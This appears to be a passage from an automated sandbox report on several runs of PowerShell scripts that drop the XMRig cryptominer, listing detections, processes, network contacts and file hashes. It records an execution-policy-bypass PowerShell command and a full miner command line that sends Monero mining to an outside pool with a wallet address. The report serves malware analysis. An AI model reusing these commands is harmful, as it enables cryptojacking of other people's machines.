N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 107.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000001D6D4770000-0x000001D6D4792000-memory.dmp

memory/4988-6-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-9-0x000001D6ECDC0000-0x000001D6ECE36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ziy0wmgm.tgb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x000001D6D4940000-0x000001D6D4952000-memory.dmp

memory/4988-61-0x000001D6D4930000-0x000001D6D493A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4444-90-0x0000025449AC0000-0x0000025449AE0000-memory.dmp

memory/4444-91-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4988-92-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4444-93-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-96-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-97-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-98-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-99-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-100-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-101-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-102-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-103-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-104-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-105-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-106-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-107-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-108-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-109-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-110-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-111-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-112-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-113-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-114-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-115-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-116-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-117-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-118-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-119-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-120-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-121-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-122-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-123-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-124-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-125-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-126-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-127-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-128-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-129-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-130-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-131-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-132-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-133-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-134-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-135-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-136-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-137-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-138-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-139-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-140-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-141-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-142-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-143-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-144-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-145-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-146-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-147-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-148-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-149-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-150-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-151-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-152-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-153-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-154-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-155-0x00007FF651D60000-0x00007FF652993000-memory.dmp

memory/4444-156-0x00007FF651D60000-0x00007FF652993000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

memory/512-4-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-5-0x000002F8B4000000-0x000002F8B4022000-memory.dmp

memory/512-6-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-9-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-10-0x000002F8B42C0000-0x000002F8B4336000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tumb5v2k.fkz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/512-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-48-0x000002F8B4450000-0x000002F8B4462000-memory.dmp

memory/512-61-0x000002F8B4090000-0x000002F8B409A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4112-90-0x00000291289A0000-0x00000291289C0000-memory.dmp

memory/4112-91-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-92-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/512-93-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-94-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-95-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/4112-96-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-97-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-98-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-99-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-100-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-101-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-102-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-103-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-104-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-105-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-106-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-107-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-108-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-109-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-110-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-111-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-112-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-113-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-114-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-115-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-116-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-117-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-118-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-119-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-120-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-121-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-122-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-123-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-124-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-125-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-126-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-127-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-128-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-129-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-130-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-131-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-132-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-133-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-134-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-135-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-136-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-137-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-138-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-139-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-140-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-141-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-142-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-143-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-144-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-145-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-146-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-147-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-148-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-149-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-150-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-151-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-152-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-153-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-154-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-155-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

memory/4112-156-0x00007FF76E630000-0x00007FF76F263000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:04

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/2088-0-0x00007FFD124B3000-0x00007FFD124B5000-memory.dmp

memory/2088-9-0x00000237F4AB0000-0x00000237F4AD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyj55zdw.zth.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2088-10-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-11-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-12-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/2088-14-0x00000237F4B20000-0x00000237F4B32000-memory.dmp

memory/2088-15-0x00000237F4A20000-0x00000237F4A2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4840-46-0x00000284CCF30000-0x00000284CCF50000-memory.dmp

memory/4840-47-0x00000284CE730000-0x00000284CE750000-memory.dmp

memory/4840-48-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/2088-50-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/4840-49-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/2088-51-0x00007FFD124B3000-0x00007FFD124B5000-memory.dmp

memory/4840-52-0x00000284CE750000-0x00000284CE770000-memory.dmp

memory/4840-53-0x00000284CE770000-0x00000284CE790000-memory.dmp

memory/4840-54-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-55-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-56-0x00000284CE750000-0x00000284CE770000-memory.dmp

memory/4840-57-0x00000284CE770000-0x00000284CE790000-memory.dmp

memory/4840-58-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-59-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-60-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-61-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-62-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-63-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-64-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-65-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-66-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-67-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-68-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-69-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-70-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-71-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-72-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-73-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-74-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-75-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-76-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-77-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-78-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-79-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-80-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-81-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-82-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-83-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-84-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-85-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-86-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-87-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-88-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-89-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-90-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-91-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-92-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

